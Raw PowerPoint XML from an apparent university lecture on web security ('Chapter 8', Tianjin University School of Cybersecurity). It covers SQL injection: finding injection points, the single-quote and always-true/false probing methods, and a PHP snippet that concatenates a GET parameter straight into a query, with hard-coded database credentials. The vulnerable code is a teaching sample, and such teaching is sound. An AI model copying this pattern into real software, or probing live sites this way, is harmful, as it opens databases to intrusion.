            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1180313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78</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24084602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79</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="267508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11</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15892974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80</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="183613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81</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28520863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82</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2046563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83</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2362379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86</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23308790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87</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="91743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88</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="471917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89</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3887564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90</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4076210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91</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="211463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12</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38632593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94</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2936924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95</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3507662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96</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38989819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97</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28553741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98</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="377632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8EF20F-F223-2C45-BD7A-9B601D3BF613}" type="slidenum">
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>13</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="111472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B6AE6-0F78-6216-7AF5-6726399100A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39FD6AA-30F6-5C3F-3EE7-BFE6D7006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7D73BDC-A4BD-9A30-7BCE-2AC3253523A6}"/>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FC9F2575-E4B1-62FC-49C1-D118102C36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71AB958-84FF-7365-C691-A4EEC19CEE7B}"/>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14840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9D4E8-11CA-748C-E6FA-F60C19341BA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8CB8633-D854-E50B-1F48-AA06C2FF316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B88B8BA-4113-B51C-B860-F9E9A7302FAC}"/>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F8B34A8F-DC4B-62B4-D121-926134BB22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4FBCF73-8D2C-1252-CFF3-9E6524F4D241}"/>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902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E20C33-B5DD-2C39-5F2E-DCB44066B8A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8E8FDD-1E9A-1EE8-21A2-DC3D54BA297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6DB63C5-D405-3606-AAFB-2108B66318E9}"/>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592D0286-14EA-D689-9044-91218E9C800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C568CF9-D404-6E30-F1CB-233CAABDCB81}"/>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2332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1455A-0381-580A-1512-4A43DDC475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EF51B62-823F-8534-7029-FA440854B24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0C4D083-FC02-2E0E-91A8-1E613727C0B1}"/>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A998AA93-685B-5403-AED1-1F689721068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C291AD-326E-E68E-9370-AB9BDA8CB2C7}"/>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96880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F2707-1E3B-F096-4565-4C2A12B50BF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BCEA78D-A3F2-E6BE-B1A2-ADC90771C3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65AA955-DC17-4C52-A1FF-5832A7DF9C54}"/>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84760B18-19F3-8165-3D80-3DD95429CF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770D414-5E19-33F9-51C9-211E5B9E7EC0}"/>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61422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13DD8-7D99-7BCA-D8AF-DFF466D3B25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F26F3-0A0C-AB47-FF95-1CF190C60C0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D351614-A679-C947-0E0F-77A50468DE0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628822F-01AB-6193-1A8B-B6784EE12528}"/>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6" name="页脚占位符 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4AF8F26C-AA96-2C7B-5631-1305F37F41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33879A-3C14-EB9F-A839-EBFC32FD11EA}"/>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75676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5349D-E202-2C02-0382-535D61A5662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8FF55E9-8109-9888-2DCC-44F00C3E9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8A2C91B-52FD-49CC-6AA7-3D5920121A9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FDDCEE6-A8BE-4137-9ECB-70383E86B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24737B7-56A9-D671-B733-DF8509E9895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8A3D82F-91CC-385C-0777-DAF8A941A7AF}"/>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8" name="页脚占位符 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A1CB569B-474D-6405-A6C4-08057754B7A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A8B5387-079D-B16D-B803-90DC74A41ADF}"/>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66014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8D2CD-54A7-2DDC-CBDB-51FDBCE67B6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A424421-1F2B-7486-9EF3-9F3961EDCF66}"/>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4" name="页脚占位符 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95FBAAB8-D5DE-AD62-A264-F7B1D04A5EF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6D0F212-F2F2-F467-403B-4C1773BF887C}"/>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76450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D4CB6A-FCB8-2D0A-385F-4EFC50AF38A8}"/>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3" name="页脚占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9001FC97-2266-4F43-8729-6AB80A583A0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0BDCAF6-F299-C3D9-AB84-F55DBAC29846}"/>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273377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0A83D-911B-A357-486D-796AC1222A6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C0E27E-BF89-9366-21C4-F7B2CB74B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E240773-406F-D374-8C7E-23BBB49B0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9A8C860-ABB5-7C79-9487-E2CB460F9555}"/>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6" name="页脚占位符 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91415829-FC76-4E8D-8180-810534CCC2C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9D682E-520C-2823-AA74-A7E8325354DE}"/>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255693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2020-9BCF-7134-49AC-3D36752AE9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9015984-6599-2277-5674-0804C6681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82FF0A7-1A97-75ED-8FF5-EA2899446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726016E-67A5-5CB1-0EB7-48BE089CC176}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{93FF2699-7A0A-C748-ACC7-2CAB77C14AF5}" type="datetimeFigureOut">
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2023/12/27</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="页脚占位符 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0BAB8054-A422-F0ED-31B7-AF0ABCBA1EC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3D560F8-345C-E5DF-353C-1F6E477790AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:body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488916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E06723-332C-8C86-7560-43ECD5427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3A01A93-A620-5A44-A80E-BD970CD56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7FD547B-4816-5359-90FB-BBDE72FE7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F2699-7A0A-C748-ACC7-2CAB77C14AF5}" type="datetimeFigureOut">
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2023/12/27</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="页脚占位符 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2DEF939-18F5-DF28-5A64-3D6313373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E8E8157-0AF9-E930-04DE-E119BD672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FAE69-AE0C-9344-8225-14641FCC96A0}" type="slidenum">
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="387453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1.tmp"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag36.xml"/><Relationship Id="rId16"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image" Target="../media/image1.tmp"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag51.xml"/><Relationship Id="rId16"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tags" Target="../tags/tag6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slideLayout" Target="../slideLayouts/slideLayout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 Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag66.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag80.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19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.tmp"/><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893B42B-EB02-E974-F41C-D271ED5846AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1720054"/>
            <a:ext cx="12192000" cy="2376264"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0048A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7200" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>第八章  </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="7200" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="7200">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>安全</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="72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4031D13-2299-1308-7FB6-D516B8E887BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5080337" y="4221088"/>
            <a:ext cx="2031325" cy="1135054"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>天津大学 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400"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2400" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>网络安全学院</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27836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7" y="1155220"/>
            <a:ext cx="172354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寻找注入点</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7" y="1719592"/>
            <a:ext cx="4968552" cy="4289123"/>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如果要对一个网站进行</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注入攻击，首先需要找到存在</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注入漏洞的地方，也就是注入点。可能的</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注入点一般存在于登录页面、查找页面或添加页面等用户可以查找或修改数据的地方。</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寻找注入点的思想就是在参数后插入可能使查询结果发生改变的</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US"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代码。如果插入的代码没有被数据库执行，而是当作普通字符串处理了，应用就是安全的；如果插入的代码被数据库执行了，通常说明存在</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US"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注入漏洞。</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384032" y="1145577"/>
            <a:ext cx="4824535"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寻找注入点</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384032" y="1699884"/>
            <a:ext cx="4968551" cy="2750240"/>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GET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型的请求最容易被注入：通常我们关注</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CGI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或</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的网页，尤其是</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中携带参数的，例如</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http://xxx/</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xxx.asp?id</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numorstring</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其中，参数可以是整数类型，也可以是字符串类型。</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常用的寻找注入点方法有：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="组合 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D6AEB2BB-04B5-08ED-B052-D039EAB51A25}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6446017" y="4542766"/>
            <a:ext cx="4844579" cy="599684"/>
            <a:chOff x="1037584" y="1052512"/>
            <a:chExt cx="10116824" cy="793198"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="矩形 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CAE7EB87-38FE-E40D-24D7-BBB287B75226}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1037584" y="1053400"/>
              <a:ext cx="1514316"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01</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ED9F2250-D947-EED8-03DF-A9377D0350DD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2551901" y="1052512"/>
              <a:ext cx="8602507"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单引号法</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="10" name="组合 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1953825E-576F-1386-1166-6E1BE0CF3127}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6450969" y="5301208"/>
            <a:ext cx="4844579" cy="599684"/>
            <a:chOff x="1037584" y="1052512"/>
            <a:chExt cx="10116824" cy="793198"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="矩形 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8CB94FF6-6F48-6C57-8FE3-E9F917DDFBE5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1037584" y="1053400"/>
              <a:ext cx="1514316" cy="792310"/>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lumMod val="85000"/>
                      <a:lumOff val="15000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>02</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2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13FF505-6BC6-A422-580D-233FD3C6E084}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2551901" y="1052512"/>
              <a:ext cx="8602507" cy="7923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永真永假法</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1057449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839416" y="110920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单引号法</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329220" y="1592001"/>
            <a:ext cx="5104569" cy="4616648"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>&lt;?php</a:t>
            </a:r>
            <a:endParaRPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="001080"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>  $servername</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31515"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>"localhost"</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$username</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31515"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>"root"</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$password</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31515"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>"ningmeng"</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$dbname</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31515"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>"myDB"</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$conn</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0000FF"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>new</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267F99"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>mysqli</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$servername</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$username</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$password</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$dbname</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AF00DB"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>  if</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$conn</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001080"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>connect_error</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AF00DB"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>    die</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"Connection failed: "</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$conn</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001080"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>connect_error</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0000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>  }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="001080"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>  $sql</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31515"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>"select * from category where userid = '"</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$_GET</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"userid"</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795E26"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
